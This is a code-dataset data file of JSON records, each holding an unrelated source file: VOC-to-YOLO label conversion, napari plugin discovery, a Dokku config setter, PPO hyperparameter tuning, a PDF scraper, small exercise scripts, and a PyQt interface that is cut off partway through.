{"seq_id":"373261290","text":"# -*- coding: UTF-8 -*-\nimport glob\nimport xml.etree.ElementTree as ET\nimport pickle\nimport os\nfrom os import listdir, getcwd\nfrom os.path import join\n\nsets=[('2012', 'TCFBA'), ('2012', 'TDINR'), ('2012', 'TDNPR'), ('2012', 'TEOTS'), ('2012', 'TEWR0'),('2012', 'TPDPL'),('2012', 'TSFAS'),('2012', 'TTP2S')]\n\nclasses = [\"TCFBA\", \"TDINR\", \"TDNPR\", \"TEOTS\", \"TEWR0\",\"TPDPL\",\"TSFAS\",\"TTP2S\"]\n\n\ndef convert(size, box):\n dw = 1./(size[0])\n dh = 1./(size[1])\n x = (box[0] + box[1])/2.0 - 1\n y = (box[2] + box[3])/2.0 - 1\n w = box[1] - box[0]\n h = box[3] - box[2]\n x = x*dw\n w = w*dw\n y = y*dh\n h = h*dh\n return (x,y,w,h)\n\ndef convert_annotation(year, image_id):\n print('%s'%(image_id))\n in_file = open('VOCdevkit/VOC%s/Annotations/%s.xml'%(year, image_id))\n out_file = open('VOCdevkit/VOC%s/labels/%s.txt'%(year, image_id), 'w')\n tree=ET.parse(in_file)\n root = tree.getroot()\n size = root.find('size')\n w = int(size.find('width').text)\n h = int(size.find('height').text)\n\n for obj in root.iter('object'):\n difficult = obj.find('difficult').text\n cls = obj.find('name').text\n if cls not in classes or int(difficult)==1:\n continue\n cls_id = classes.index(cls)\n xmlbox = obj.find('bndbox')\n b = (float(xmlbox.find('xmin').text), float(xmlbox.find('xmax').text), float(xmlbox.find('ymin').text), float(xmlbox.find('ymax').text))\n bb = convert((w,h), b)\n out_file.write(str(cls_id) + \" \" + \" \".join([str(a) for a in bb]) + '\\n')\n\nif __name__ == '__main__':\n wd = getcwd()\n\n for year, image_set in sets:\n if not os.path.exists('VOCdevkit/VOC%s/labels/'%(year)):\n os.makedirs('VOCdevkit/VOC%s/labels/'%(year))\n image_ids=glob.glob('/home/baymin/daily-work/new-work/素材/腾讯面板/VOCdevkit/VOC2012/JPEGImages/*.jpg')\n list_file = open('%s_%s.txt'%(year, image_set), 'w')\n for num, image_id in enumerate(image_ids):\n filepath, tmpfilename = os.path.split(image_id)\n filename = os.path.splitext(tmpfilename)[0]\n print('=======%s' % filename)\n if filename == '1' or filename == '-1':\n continue\n list_file.write('%s/VOCdevkit/VOC%s/JPEGImages/%s.jpg\\n'%(wd, year, filename))\n convert_annotation(year, filename)\n list_file.close()\n\n os.system(\"cat *_*.txt > train.txt\")\n os.system(\"cat *_*.txt > 
val.txt\")\n","sub_path":"darknet-tools/onlyXmlAndJpg2Label.py","file_name":"onlyXmlAndJpg2Label.py","file_ext":"py","file_size_in_byte":2458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"85671528","text":"import Executor\nfrom File import DEFAULT_FILE_INFO\n\n\ndef script(name, stdInput = None, fileInput = DEFAULT_FILE_INFO, stdOutput = None, fileOutput = DEFAULT_FILE_INFO):\n with fileInput.exists():\n fileInput.write(fileInput.data)\n with fileOutput.exists():\n with Executor.run(name) as process:\n stdout, stderr = process.communicate(stdInput)\n assert not stderr, 'There is some errors while script {} was executing: {}'.format(name, stderr)\n assert process.returncode == 0, 'Script {} finished with exit code {}'.format(name, process.returncode)\n assert stdOutput is None or stdout.strip() == stdOutput, 'Script {} output does not match expected.\\nExpected: {}\\nGot: {}'.format(name, stdOutput, stdout)\n if fileOutput != DEFAULT_FILE_INFO:\n fileOutputData = fileOutput.read()\n assert fileOutputData.strip() == fileOutput.data, 'Script {} file {} output does not match expected.\\nExpected: {}\\nGot: {}'.format(name, fileOutput.name, fileOutput.data, fileOutputData)\n","sub_path":"Tests/utils/Assert.py","file_name":"Assert.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"556088097","text":"import importlib\nimport os\nimport pkgutil\nimport sys\nfrom logging import getLogger\nfrom types import ModuleType\nfrom typing import Dict, Generator, Optional, Tuple, Union\n\nimport pluggy\n\nfrom . import _builtins, hook_specifications\nfrom ._hook_callers import _HookCaller\nfrom .exceptions import (\n PluginError,\n PluginImportError,\n PluginRegistrationError,\n fetch_module_metadata,\n)\n\nlogger = getLogger(__name__)\n\nif sys.version_info >= (3, 8):\n from importlib import metadata as importlib_metadata\nelse:\n import importlib_metadata\n\n\npluggy.manager._HookCaller = _HookCaller\n\n\nclass _HookRelay:\n \"\"\"Hook holder object for storing _HookCaller instances.\n\n This object triggers (lazy) discovery of plugins as follows: When a plugin\n hook is accessed (e.g. plugin_manager.hook.napari_get_reader), if\n ``self._needs_discovery`` is True, then it will trigger autodiscovery on\n the parent plugin_manager. 
Note that ``PluginManager.__init__`` sets\n ``self.hook._needs_discovery = True`` *after* hook_specifications and\n builtins have been discovered, but before external plugins are loaded.\n \"\"\"\n\n def __init__(self, manager: 'PluginManager'):\n self._manager = manager\n self._needs_discovery = False\n\n def __getattribute__(self, name) -> _HookCaller:\n \"\"\"Trigger manager plugin discovery when accessing hook first time.\"\"\"\n if name not in ('_needs_discovery', '_manager'):\n if self._needs_discovery:\n self._manager.discover()\n return object.__getattribute__(self, name)\n\n def items(self):\n \"\"\"Iterate through hookcallers, removing private attributes.\"\"\"\n return [\n (k, val) for k, val in vars(self).items() if not k.startswith(\"_\")\n ]\n\n\nclass PluginManager(pluggy.PluginManager):\n PLUGIN_ENTRYPOINT = \"napari.plugin\"\n PLUGIN_PREFIX = \"napari_\"\n\n def __init__(\n self,\n project_name: str = \"napari\",\n autodiscover: Union[bool, str] = False,\n ):\n \"\"\"pluggy.PluginManager subclass with napari-specific functionality\n\n In addition to the pluggy functionality, this subclass adds\n autodiscovery using package naming convention.\n\n Parameters\n ----------\n project_name : str, optional\n Namespace for plugins managed by this manager. by default 'napari'.\n autodiscover : bool or str, optional\n Whether to autodiscover plugins by naming convention and setuptools\n entry_points. If a string is provided, it is added to sys.path\n before importing, and removed at the end. Any other \"truthy\" value\n will simply search the current sys.path. by default True\n \"\"\"\n super().__init__(project_name)\n self.hook = _HookRelay(self)\n # a dict to store package metadata for each plugin, will be populated\n # during self._register_module\n # possible keys for this dict will be set by fetch_module_metadata()\n self._plugin_meta: Dict[str, Dict[str, str]] = dict()\n\n # project_name might not be napari if running tests\n if project_name == 'napari':\n # define hook specifications and validators\n self.add_hookspecs(hook_specifications)\n # register our own builtin plugins\n self.register(_builtins, name='builtins')\n\n self.hook._needs_discovery = True\n # discover external plugins\n if autodiscover:\n if isinstance(autodiscover, str):\n self.discover(autodiscover)\n else:\n self.discover()\n\n @property\n def hooks(self):\n \"\"\"An alias for PluginManager.hook\"\"\"\n return self.hook\n\n def discover(self, path: Optional[str] = None) -> int:\n \"\"\"Discover modules by both naming convention and entry_points\n\n 1) Using naming convention:\n plugins installed in the environment that follow a naming\n convention (e.g. \"napari_plugin\"), can be discovered using\n `pkgutil`. This also enables easy discovery on pypi\n\n 2) Using package metadata:\n plugins that declare a special key (self.PLUGIN_ENTRYPOINT) in\n their setup.py `entry_points`. discovered using `pkg_resources`.\n\n https://packaging.python.org/guides/creating-and-discovering-plugins/\n\n Parameters\n ----------\n path : str, optional\n If a string is provided, it is added to sys.path before importing,\n and removed at the end. 
by default True\n\n Returns\n -------\n count : int\n The number of plugin modules successfully loaded.\n \"\"\"\n if path is None:\n self.hook._needs_discovery = False\n\n # allow debugging escape hatch\n if os.environ.get(\"NAPARI_DISABLE_PLUGINS\"):\n import warnings\n\n warnings.warn(\n 'Plugin discovery disabled due to '\n 'environmental variable \"NAPARI_DISABLE_PLUGINS\"'\n )\n return 0\n\n if path:\n sys.path.insert(0, path)\n\n count = 0\n for plugin_name, module_name, meta in iter_plugin_modules(\n prefix=self.PLUGIN_PREFIX, group=self.PLUGIN_ENTRYPOINT\n ):\n if self.get_plugin(plugin_name) or self.is_blocked(plugin_name):\n continue\n try:\n self._register_module(plugin_name, module_name, meta)\n count += 1\n except PluginError as exc:\n logger.error(exc.format_with_contact_info())\n self.unregister(name=plugin_name)\n except Exception as exc:\n logger.error(\n f'Unexpected error loading plugin \"{plugin_name}\": {exc}'\n )\n self.unregister(name=plugin_name)\n\n if count:\n msg = f'loaded {count} plugins:\\n '\n msg += \"\\n \".join([n for n, m in self.list_name_plugin()])\n logger.info(msg)\n\n if path:\n sys.path.remove(path)\n\n return count\n\n def _register_module(\n self, plugin_name: str, module_name: str, meta: Optional[dict] = None\n ):\n \"\"\"Try to register `module_name` as a plugin named `plugin_name`.\n\n Parameters\n ----------\n plugin_name : str\n The name given to the plugin in the plugin manager.\n module_name : str\n The importable module name\n meta : dict, optional\n Metadata to be associated with ``plugin_name``.\n\n Raises\n ------\n PluginImportError\n If an error is raised when trying to import `module_name`\n PluginRegistrationError\n If an error is raised when trying to register the plugin (such as\n a PluginValidationError.)\n \"\"\"\n if meta:\n meta.update({'plugin': plugin_name})\n self._plugin_meta[plugin_name] = meta\n try:\n mod = importlib.import_module(module_name)\n except Exception as exc:\n raise PluginImportError(plugin_name, module_name) from exc\n try:\n # prevent double registration (e.g. 
from entry_points)\n if self.is_registered(mod):\n return\n self.register(mod, name=plugin_name)\n except Exception as exc:\n raise PluginRegistrationError(plugin_name, module_name) from exc\n\n def register(self, plugin: ModuleType, name=None):\n \"\"\"Register a plugin and return its canonical name or ``None``.\n\n Parameters\n ----------\n plugin : ModuleType\n The module to register\n name : str, optional\n Optional name for plugin, by default ``get_canonical_name(plugin)``\n\n Returns\n -------\n str or None\n canonical plugin name, or ``None`` if the name is blocked from\n registering.\n\n Raises\n ------\n ValueError\n if the plugin is already registered.\n \"\"\"\n plugin_name = name or self.get_canonical_name(plugin)\n\n if (\n plugin_name in self._name2plugin\n or plugin in self._plugin2hookcallers\n ):\n if self._name2plugin.get(plugin_name, -1) is None:\n # blocked plugin, return None to indicate no registration\n return\n raise ValueError(\n \"Plugin already registered: %s=%s\\n%s\"\n % (plugin_name, plugin, self._name2plugin)\n )\n\n # XXX if an error happens we should make sure no state has been\n # changed at point of return\n self._name2plugin[plugin_name] = plugin\n\n # register matching hook implementations of the plugin\n self._plugin2hookcallers[plugin] = hookcallers = []\n for name in dir(plugin):\n hookimpl_opts = self.parse_hookimpl_opts(plugin, name)\n if hookimpl_opts is not None:\n pluggy.hooks.normalize_hookimpl_opts(hookimpl_opts)\n method = getattr(plugin, name)\n hookimpl = pluggy.manager.HookImpl(\n plugin, plugin_name, method, hookimpl_opts\n )\n name = hookimpl_opts.get(\"specname\") or name\n hook = getattr(self.hook, name, None)\n if hook is None:\n hook = _HookCaller(name, self._hookexec)\n setattr(self.hook, name, hook)\n elif hook.has_spec():\n self._verify_hook(hook, hookimpl)\n hook._maybe_apply_history(hookimpl)\n hook._add_hookimpl(hookimpl)\n hookcallers.append(hook)\n return plugin_name\n\n\ndef entry_points_for(\n group: str,\n) -> Generator[\n Tuple[importlib_metadata.Distribution, importlib_metadata.EntryPoint],\n None,\n None,\n]:\n \"\"\"Yield all entry_points matching \"group\", from any distribution.\n\n Distribution here refers more specifically to the information in the\n dist-info folder that usually accompanies an installed package. 
If a\n package in the environment does *not* have a ``dist-info/entry_points.txt``\n file, then it will not be discovered by this function.\n\n Note: a single package may provide multiple entrypoints for a given group.\n\n Parameters\n ----------\n group : str\n The name of the entry point to search.\n\n Yields\n -------\n tuples\n (Distribution, EntryPoint) objects for each matching EntryPoint\n that matches the provided ``group`` string.\n\n Example\n -------\n >>> list(entry_points_for('napari.plugin'))\n [(,\n EntryPoint(name='napari-reg',value='napari_reg',group='napari.plugin')),\n (,\n EntryPoint(name='myplug',value='another.module',group='napari.plugin'))]\n \"\"\"\n for dist in importlib_metadata.distributions():\n for ep in dist.entry_points:\n if ep.group == group:\n yield dist, ep\n\n\ndef modules_starting_with(prefix: str) -> Generator[str, None, None]:\n \"\"\"Yield all module names in sys.path that begin with `prefix`.\n\n Parameters\n ----------\n prefix : str\n The prefix to search\n\n Yields\n -------\n module_name : str\n Yields names of modules that start with prefix\n\n \"\"\"\n for finder, name, ispkg in pkgutil.iter_modules():\n if name.startswith(prefix):\n yield name\n\n\ndef iter_plugin_modules(\n prefix: Optional[str] = None, group: Optional[str] = None\n) -> Generator[Tuple[str, str, dict], None, None]:\n \"\"\"Discover plugins using naming convention and/or entry points.\n\n This function makes sure that packages that *both* follow the naming\n convention (i.e. starting with `prefix`) *and* provide and an entry point\n `group` will only be yielded once. Precedence is given to entry points:\n that is, if a package satisfies both critera, only the modules specifically\n listed in the entry points will be yielded. These MAY or MAY NOT be the\n top level module in the package... whereas with naming convention, it is\n always the top level module that gets imported and registered with the\n plugin manager.\n\n The NAME of yielded plugins will be the name of the package provided in\n the package METADATA file when found. This allows for the possibility that\n the plugin name and the module name are not the same: for instance...\n (\"napari-plugin\", \"napari_plugin\").\n\n Plugin packages may also provide multiple entry points, which will be\n registered as plugins of different names. For instance, the following\n ``setup.py`` entry would register two plugins under the names\n ``myplugin.register`` and ``myplugin.segment``\n\n .. code-block:: python\n\n import sys\n\n setup(\n name=\"napari-plugin\",\n entry_points={\n \"napari.plugin\": [\n \"myplugin.register = napari_plugin.registration\",\n \"myplugin.segment = napari_plugin.segmentation\"\n ],\n },\n packages=find_packages(),\n )\n\n\n Parameters\n ----------\n prefix : str, optional\n A prefix by which to search module names. If None, discovery by naming\n convention is disabled., by default None\n group : str, optional\n An entry point group string to search. 
If None, discovery by Entry\n Points is disabled, by default None\n\n Yields\n -------\n plugin_info : tuple\n (plugin_name, module_name, metadata)\n \"\"\"\n seen_modules = set()\n if group and not os.environ.get(\"NAPARI_DISABLE_ENTRYPOINT_PLUGINS\"):\n for dist, ep in entry_points_for(group):\n match = ep.pattern.match(ep.value)\n if match:\n module = match.group('module')\n seen_modules.add(module.split(\".\")[0])\n yield ep.name, module, fetch_module_metadata(dist)\n if prefix and not os.environ.get(\"NAPARI_DISABLE_NAMEPREFIX_PLUGINS\"):\n for module in modules_starting_with(prefix):\n if module not in seen_modules:\n try:\n name = importlib_metadata.metadata(module).get('Name')\n except Exception:\n name = None\n yield name or module, module, fetch_module_metadata(module)\n","sub_path":"napari/plugins/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":14462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"212700664","text":"def phy(vs):\n xc = yc = zc = 0\n for v in vs:\n xc += v[0]\n yc += v[1]\n zc += v[2]\n if(xc==yc==zc==0):\n return \"YES\"\n else:\n return \"NO\"\nvs = []\nfor x in range(int(input())):\n v = list(map(int, input().split()))\n vs.append(v)\nprint(phy(vs))\n","sub_path":"Young Physicist.py","file_name":"Young Physicist.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"168437117","text":"import os\n\nimport click\n\n\ndef run_commands(command, app, env_dict):\n for env_name, env_value in env_dict.items():\n os.system(command.format(app_name=app, env_name=env_name, env_value=env_value))\n\n\ndef read_env_file(env):\n f = env.readlines()\n return {line.strip().split(\"=\")[0]: line.strip().split(\"=\")[1] for line in f}\n\n\n@click.command()\n@click.option(\n \"--app\",\n default=\"\",\n help=\"The name of your app, this is neccessary \"\n \"when your are using the dokku cli directly instead of the dokku-toolbet wrapper\",\n)\n@click.argument(\n \"env\", type=click.File(\"r\"),\n)\ndef set_dokku_app_envs(env, app):\n \"\"\"Simple program that set environment variables for a project deploy with dokku\n on a vps, taking the env file path as argument.\n \"\"\"\n\n command = (\n \"dokku config:set {app} {env_name}={env_value}\"\n if app\n else \"dt config:set {env_name}={env_value}\"\n )\n\n env_dict = read_env_file(env=env)\n\n if not env_dict:\n return\n\n run_commands(command, app, env_dict)\n\n # set random secret key and admin url, comment if not needed\n extra = {\n \"DJANGO_SECRET_KEY\": \"$(openssl rand -base64 64 | tr -dc 'A-HJ-NP-Za-km-z2-9')\",\n \"DJANGO_ADMIN_URL\": \"$(openssl rand -base64 4096 | tr -dc 'A-HJ-NP-Za-km-z2-9' | head -c 32)/\",\n \"PYTHONHASHSEED\": \"random\",\n }\n\n run_commands(command=command, app=app, env_dict=extra)\n\n\nif __name__ == \"__main__\":\n set_dokku_app_envs()\n","sub_path":"dokku_config.py","file_name":"dokku_config.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"19037604","text":"#10/8/14\r\n#This program will take a user input of the amount budgeted for a month.\r\n#A loop will prompt the user to enter each of the expenses for the month, and keep a total\r\n#The program will display the amount the user is over of under budget.\r\n\r\nbudget=int(input(\"Please enter your budget for this month: \"))\r\nnumExp=int(input(\"Please enter how many 
expenses you have: \"))\r\ncount=1\r\nsum=0\r\nwhile count<=numExp:\r\n expense=int(input(\"Please enter your expense: \"))\r\n sum=sum+expense\r\n count=count+1\r\nif sum>budget:\r\n print(\"You are over your budget of\", budget)\r\nelse:\r\n print(\"You are under your budget of\", budget)\r\n \r\n","sub_path":"Week 6 Py Labs/budgeting.py","file_name":"budgeting.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"649947716","text":"import gym\nimport pybullet_envs as pe\n\nfrom stable_baselines3 import PPO\n\n# import stable_baselines3\n\n# from stable_baselines3.ppo import MlpPolicy\nfrom stable_baselines3.common.evaluation import evaluate_policy\nimport numpy as np\nimport time\nfrom torch.nn import ReLU, Tanh\n\nimport pyhopper\n\n\ndef score_trained_model(model):\n final_rewards = []\n for i in range(20):\n obs = model.env.reset()\n done = False\n total_reward = 0\n while not done:\n action, _ = model.predict(obs, deterministic=True)\n obs, reward, done, _ = model.env.step(action)\n total_reward += reward\n final_rewards.append(total_reward)\n return np.mean(final_rewards)\n\n\ndef score_random():\n env = gym.make(\"CartPoleContinuousBulletEnv-v0\")\n\n final_rewards = []\n for i in range(20):\n obs = env.reset()\n total_reward = 0\n steps = 0\n done = False\n while not done:\n action = env.action_space.sample()\n obs, reward, done, _ = env.step(action)\n total_reward += reward\n steps += 1\n print(\"steps: \", steps)\n final_rewards.append(total_reward)\n return np.mean(final_rewards)\n\n\ndef render_trained_model(model):\n model.env.render()\n obs = model.env.reset()\n done = False\n while not done:\n action, _ = model.predict(obs)\n obs, reward, done, _ = model.env.step(action)\n # model.env.render()\n model.env.close()\n\n\ndef train_ppo(params, render=False):\n env = gym.make(\"CartPoleContinuousBulletEnv-v0\")\n try:\n model = PPO(\n \"MlpPolicy\",\n env,\n policy_kwargs={\n \"net_arch\": [\n {\n \"pi\": [params[\"size\"], params[\"size\"]],\n \"vf\": [params[\"size\"], params[\"size\"]],\n }\n ],\n \"activation_fn\": {\"relu\": ReLU, \"tanh\": Tanh}[params[\"activation\"]],\n \"normalize_images\": True,\n },\n learning_rate=params[\"lr\"],\n n_epochs=params[\"n_epochs\"],\n gae_lambda=params[\"gae_lambda\"],\n max_grad_norm=params[\"max_grad_norm\"],\n ent_coef=params[\"ent_coef\"],\n ).learn(40000)\n except (ValueError, ZeroDivisionError):\n raise pyhopper.CancelEvaluation()\n # score, _ = evaluate_policy(model, gym.make(\"AntBulletEnv-v0\"))\n # print(\"total reward: \", score)\n score = score_trained_model(model)\n # print(\"total reward: \", score)\n if render:\n print(\"total reward: \", score)\n render_trained_model(model)\n return score\n\n\nif __name__ == \"__main__\":\n print(\"Random\", score_random())\n # default_params = {\n # \"lr\": 0.0005,\n # \"n_epochs\": 10,\n # \"gae_lambda\": 0.95,\n # \"max_grad_norm\": 1,\n # \"ent_coef\": 0,\n # \"activation\": \"tanh\",\n # \"size\": 128,\n # }\n # start = time.time()\n # train_ppo(default_params)\n # took = time.time() - start\n # print(f\"Took {took/60:0.1f} minutes\")\n # import sys\n\n # sys.exit(1)\n search = pyhopper.Search(\n {\n \"lr\": pyhopper.float(0.005, 0.0001, log=True),\n \"n_epochs\": pyhopper.int(5, 20),\n \"gae_lambda\": pyhopper.choice([0.8, 0.9, 0.95, 0.99], is_ordinal=True),\n \"max_grad_norm\": pyhopper.choice([0.1, 0.5, 1.0, 2.0], is_ordinal=True),\n \"ent_coef\": pyhopper.float(0, 0.2, precision=1),\n 
\"activation\": pyhopper.choice([\"tanh\", \"relu\"]),\n \"size\": pyhopper.int(64, 256, power_of=2),\n }\n )\n best_params = search.run(\n pyhopper.wrap_n_times(train_ppo, n=3, yield_after=0),\n # train_ppo,\n direction=\"max\",\n timeout=\"4h\",\n n_jobs=\"4x per-gpu\",\n canceler=pyhopper.cancelers.QuantileCanceler(0.6),\n )\n print(\"best_params\", best_params)\n train_ppo(best_params, render=True)\n\n# ============================ Summary ===========================\n# Mode : Best f : Steps : Canceled : Time\n# ---------------- : ---- : ---- : ---- : ----\n# Initial solution : 200 : 1 : 0 : 08:32 (m:s)\n# Random seeding : 200 : 32 : 16 : 03:32:42 (h:m:s)\n# Local sampling : 200 : 118 : 19 : 10:32:28 (h:m:s)\n# ---------------- : ---- : ---- : ---- : ----\n# Total : 200 : 151 : 35 : 03:57:31 (h:m:s)\n# ================================================================\n# best_params {'lr': 0.0017706780889095847, 'n_epochs': 8, 'gae_lambda': 0.9, 'max_grad_norm': 2.0, 'ent_coef': 0.1, 'activation': 'tanh', 'size': 64}","sub_path":"examples/ppo_ipend.py","file_name":"ppo_ipend.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"60845545","text":"def z4():\n for frame_i in range(imageframe_nmbr):\n if os.path.isfile(output_dir + 'Cells' + str(frame_i) + '.hdf5'):\n try:\n cell_reset = eval(input('Reset cells? [0, no]; 1, yes. '))\n except SyntaxError:\n cell_reset = 0\n \n if not cell_reset:\n continue\n \n print('Creating Cells' + str(frame_i) + '.hdf5.') \n \n with h5py.File(output_dir + 'brain_mask' + str(frame_i) + '.hdf5', 'r') as file_handle:\n blok_nmbr = file_handle['blok_nmbr'][()]\n blok_lidx = file_handle['blok_lidx'][()]\n \n cell_dir = output_dir + 'cell_series/' + str(frame_i)\n Cmpn_position = []\n Cmpn_spcesers = []\n Cmpn_timesers = []\n for blok_i in range(blok_nmbr):\n try:\n with h5py.File(cell_dir + '/Block' + str(blok_i).zfill(5) + '.hdf5', 'r') as file_handle:\n for cmpn_i in file_handle['cmpn']:\n Cmpn_position.append(file_handle['cmpn'][cmpn_i]['cmpn_position'][()])\n Cmpn_spcesers.append(file_handle['cmpn'][cmpn_i]['cmpn_spcesers'][()])\n Cmpn_timesers.append(file_handle['cmpn'][cmpn_i]['cmpn_timesers'][()])\n except KeyError:\n print('Block %d is empty.' %blok_i)\n except IOError:\n if blok_lidx[blok_i]:\n print('Block %d does not exist.' 
%blok_i)\n \n cn = len(Cmpn_position)\n ln = np.max([len(i) for i in Cmpn_spcesers])\n Cmpn_position_array = np.full((cn, ln, 3), -1, dtype=int)\n Cmpn_spcesers_array = np.full((cn, ln ), np.nan)\n for i in range(cn):\n j = len(Cmpn_spcesers[i])\n Cmpn_position_array[i, :j] = Cmpn_position[i]\n Cmpn_spcesers_array[i, :j] = Cmpn_spcesers[i]\n Cmpn_timesers_array = np.array(Cmpn_timesers)\n \n with h5py.File(output_dir + 'Cells' + str(frame_i) + '.hdf5', 'w') as file_handle:\n file_handle['Cmpn_position'] = Cmpn_position_array\n file_handle['Cmpn_spcesers'] = Cmpn_spcesers_array\n file_handle['Cmpn_timesers'] = Cmpn_timesers_array\n \n file_handle['freq'] = freq_stack\n file_handle['resn'] = np.array([resn_x, resn_x, resn_y, ds])\n file_handle['dims'] = np.array([lx//ds, ly//ds, lz, lt])\n \nz4()\n","sub_path":"z4_cell_collect.py","file_name":"z4_cell_collect.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"557993287","text":"from .scrappers import ScrapeInlineData, ScrapeTableData, ScrapeHeadData\nfrom .utils import PdfReader, PdfDataContainer\n\n\nclass PdfScrapper:\n pdf_reader = PdfReader()\n pdf_scrapper_inline_data = ScrapeInlineData()\n pdf_scrapper_table_data = ScrapeTableData()\n pdf_scrapper_head_data = ScrapeHeadData()\n\n def set_data(self, path: str) -> None:\n PdfDataContainer.pdf_path = path\n\n pdf_query_data = self.pdf_reader.read_pdf(path)\n\n if pdf_query_data:\n PdfDataContainer.pdfquery = pdf_query_data.get('pdf')\n PdfDataContainer.width = pdf_query_data.get('width')\n PdfDataContainer.height = pdf_query_data.get('height')\n PdfDataContainer.pages_count = self.pdf_reader.pages_count(PdfDataContainer.pdfquery)\n\n def set_inline_data(self, data: list) -> None:\n PdfDataContainer.inline_data_structure = data\n\n def set_table_data(self, data: list):\n PdfDataContainer.table_data_structure = data\n\n def set_invalid_fields_data(self, data: list):\n PdfDataContainer.invalid_fields = data\n\n def set_mail_data(self, email_to, email_from, password, port, host):\n PdfDataContainer.email_to = email_to\n PdfDataContainer.email_from = email_from\n PdfDataContainer.email_from_password = password\n PdfDataContainer.email_host = host\n PdfDataContainer.email_port = port\n\n def scrape_inline_data(self, page, schema):\n if PdfDataContainer.pdfquery is None:\n return\n\n self.set_inline_data(schema)\n return self.pdf_scrapper_inline_data.scrape(page)\n\n def scrape_table_data(self, page, schema):\n if PdfDataContainer.pdfquery is None:\n return\n\n self.set_table_data(schema)\n return self.pdf_scrapper_table_data.scrape(page)\n\n def set_logger(self, logger):\n PdfDataContainer.logger = logger\n\n def _validate_dict(self, data: dict):\n structure = {}\n for k, v in data.items():\n errors_line = ''\n for ivl_field in PdfDataContainer.invalid_fields:\n if ivl_field in v:\n errors_line += f\"contains {ivl_field}; \"\n if errors_line:\n structure[k] = errors_line\n return structure\n\n def validate_scrapping_data(self, scrapping_data):\n errors = []\n\n for s in scrapping_data:\n data = scrapping_data[s]\n\n structure = {}\n if isinstance(data, dict):\n validation_res = self._validate_dict(data)\n if validation_res:\n structure[s] = validation_res\n else:\n list_errors = []\n for d in data:\n validation_res = self._validate_dict(d)\n if validation_res:\n list_errors.append(validation_res)\n if list_errors:\n structure[s] = list_errors\n\n if structure:\n errors.append(structure)\n\n return 
errors\n\n def scrape_all_data(self, page=None) -> dict or None:\n if PdfDataContainer.pdfquery is None:\n return\n\n results = self.pdf_scrapper_head_data.scrape(page)\n\n scrapping_data = {}\n for res in results:\n scrapping_data.update(self.scrape_inline_data(\n page=res.get('page'),\n schema=res.get('inline')\n ))\n scrapping_data.update(self.scrape_table_data(\n page=res.get('page'),\n schema=res.get('table')\n ))\n\n PdfDataContainer.logger.log(10, {'Errors': self.validate_scrapping_data(scrapping_data)})\n\n return scrapping_data\n","sub_path":"venv/Lib/site-packages/pdftodict/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"339081946","text":"import numpy as np\r\n\r\n\r\nif __name__ == '__main__':\r\n inpath = '../../data/amazon/review/info/info.txt'\r\n outpath = '../../data/amazon/review/info/info.csv'\r\n with open(outpath, 'w') as f:\r\n f.write('dataset,u,i,density,inter\\n')\r\n info = open(inpath)\r\n row = 0\r\n d = [0, 0, 0]\r\n for line in info.readlines():\r\n if row < 4:\r\n row += 1\r\n continue\r\n if row % 4 == 0:\r\n row += 1\r\n with open(outpath, 'a') as f:\r\n f.write(line[:-1] + ',')\r\n elif row % 4 == 2:\r\n row += 1\r\n sp = line.split(']')\r\n d[0] = sp[0][3:]\r\n d[1] = sp[1][3:]\r\n d[2] = sp[2][9:]\r\n with open(outpath, 'a') as f:\r\n f.write(d[0] + ',' + d[1] + ',' + d[2] + ',' +\r\n str(round(int(d[0])*int(d[1])*float(d[2])*0.01)) + '\\n')\r\n else:\r\n row += 1\r\n","sub_path":"amazon/review/fmtinfo.py","file_name":"fmtinfo.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"617700038","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nimport sys,datetime,json,pickle,os,time\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PyQt5.QtGui import QIcon\nimport sixSigmaCalcFloatLine as SSCFL\nimport sixSigmaCalcFloatBar as SSCFB\nimport sixSigmaCalcFloatPercentChangeChart as SSCFPCC\nimport csvMaker as csvMaker\nfrom tkinter import *\nfrom tkinter.filedialog import askopenfilename\n\n\n\n#choose what graph to run\nclass sinkChooseGraphType(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(441, 412)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.veiwLineGraphFloatButton = QtWidgets.QPushButton(self.centralwidget)\n self.veiwLineGraphFloatButton.setGeometry(QtCore.QRect(10, 80, 411, 31))\n self.veiwLineGraphFloatButton.setObjectName(\"veiwLineGraphFloatButton\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(10, 100, 411, 51))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label.setFont(font)\n self.label.setWordWrap(True)\n self.label.setObjectName(\"label\")\n self.veiwBarGraphFloatButton = QtWidgets.QPushButton(self.centralwidget)\n self.veiwBarGraphFloatButton.setGeometry(QtCore.QRect(10, 150, 411, 31))\n self.veiwBarGraphFloatButton.setObjectName(\"veiwBarGraphFloatButton\")\n self.label_2 = QtWidgets.QLabel(self.centralwidget)\n self.label_2.setGeometry(QtCore.QRect(10, 160, 411, 81))\n font = QtGui.QFont()\n font.setPointSize(8)\n self.label_2.setFont(font)\n 